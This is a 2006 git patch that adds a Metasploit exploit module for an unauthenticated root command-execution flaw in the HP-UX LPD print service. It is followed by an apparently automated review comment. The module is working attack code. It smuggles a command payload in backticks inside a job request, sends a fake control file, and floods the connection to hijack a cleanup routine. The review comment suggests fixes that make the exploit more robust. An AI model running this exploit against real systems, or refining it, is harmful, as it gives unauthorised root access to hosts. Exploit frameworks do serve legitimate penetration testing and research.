From 8c1194eccd6a73dd8bca50bfbf9a4a58e3b6fb4d Mon Sep 17 00:00:00 2001
From: HD Moore
Date: Mon, 16 Jan 2006 04:02:38 +0000
Subject: [PATCH] Another port
git-svn-id: file:///home/svn/incoming/trunk@3383 4d416f70-5f16-0410-b530-b9f4589650da
---
 modules/exploits/hpux/lpd/cleanup_exec.rb | 95 +++++++++++++++++++++++
 1 file changed, 95 insertions(+)
 create mode 100644 modules/exploits/hpux/lpd/cleanup_exec.rb
diff --git a/modules/exploits/hpux/lpd/cleanup_exec.rb b/modules/exploits/hpux/lpd/cleanup_exec.rb
new file mode 100644
index 0000000000..442ea40a85
--- /dev/null
+++ b/modules/exploits/hpux/lpd/cleanup_exec.rb
@@ -0,0 +1,95 @@
+require 'msf/core'
+
+module Msf
+
+class Exploits::Hpux::Lpd::CleanupExec < Msf::Exploit::Remote
+
+ include Exploit::Remote::Tcp
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'HP-UX LPD Command Execution',
+ 'Description' => %q{
+ This exploit abuses an unpublished vulnerability in the
+ HP-UX LPD service. This flaw allows an unauthenticated
+ attacker to execute arbitrary commands with the privileges
+ of the root user. The LPD service is only exploitable when
+ the address of the attacking system can be resolved by the
+ target. This vulnerability was silently patched with the
+ buffer overflow flaws addressed in HP Security Bulletin
+ HPSBUX0208-213.
+
+ },
+ 'Author' => [ 'hdm' ],
+ 'Version' => '$Revision$',
+ 'References' =>
+ [
+ [ 'URL', 'http://archives.neohapsis.com/archives/hp/2002-q3/0064.html'],
+
+ ],
+ 'Platform' => ['unix', 'hpux'],
+ 'Arch' => ARCH_CMD,
+ 'Payload' =>
+ {
+ 'Space' => 200,
+ 'DisableNops' => true,
+ 'BadChars' => "\x00\x09\x20\x2f",
+ },
+ 'PayloadCompat' =>
+ {
+ "PayloadType" => "cmd",
+ },
+ 'Targets' =>
+ [
+ [ 'Automatic Target', { }]
+ ],
+ 'DefaultTarget' => 0))
+
+ register_options(
+ [
+ Opt::RPORT(515)
+ ], self.class)
+ end
+
+ def exploit
+
+ # The job ID is squashed down to three decimal digits
+ jid = ($$ % 1000).to_s + [Time.now.to_i].pack('N').unpack('H*')[0]
+
+ # Connect to the LPD service
+ connect
+
+ print_status("Sending our job request with embedded command string...")
+ # Send the job request with the encoded command
+ sock.put(
+ "\x02" + Rex::Text.rand_text_alphanumeric(3) + jid +
+ "`" + payload.encoded + "`\n"
+ )
+
+ res = sock.get_once(1)
+ if (res[0] != 0)
+ print_status("The target did not accept our job request")
+ return
+ end
+
+ print_status("Sending our fake control file...")
+ sock.put("\x02 32 cfA" + Rex::Text.rand_text_alphanumeric(8) + "\n")
+ res = sock.get_once(1)
+ if (res[0] != 0)
+ print_status("The target did not accept our control file")
+ return
+ end
+
+
+ print_status("Forcing an error and hijacking the cleanup routine...")
+
+ begin
+ sock.put(Rex::Text.rand_text_alphanumeric(16384))
+ disconnect
+ rescue
+ end
+
+ end
+
+end
+end
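Review bot: Both `if (res[0] != 0)` checks in `exploit` index the value returned by `sock.get_once(1)` without a nil guard, so a peer that closes the connection or sends nothing raises NoMethodError on nil instead of reaching the status message on the next line; `return unless res` before each comparison (or `if (res.nil? || res[0] != 0)`) keeps that failure on the reporting branch. The two early `return`s also leave the socket opened by `connect` without a `disconnect`, since only the final `begin`/`rescue` block closes it; an `ensure` clause around the method body would cover every exit. The comparison `res[0] != 0` further relies on `String#[]` yielding an Integer, which matches the Ruby of this commit's date but not 1.9 and later, where it yields a one-character string, so a comment such as `# expects String#[] to return an Integer byte value` would save a future reader a surprise. The closing bare `rescue` with an empty body swallows every StandardError from the final write and disconnect; if that is intentional best-effort cleanup, a one-line comment saying so belongs on it.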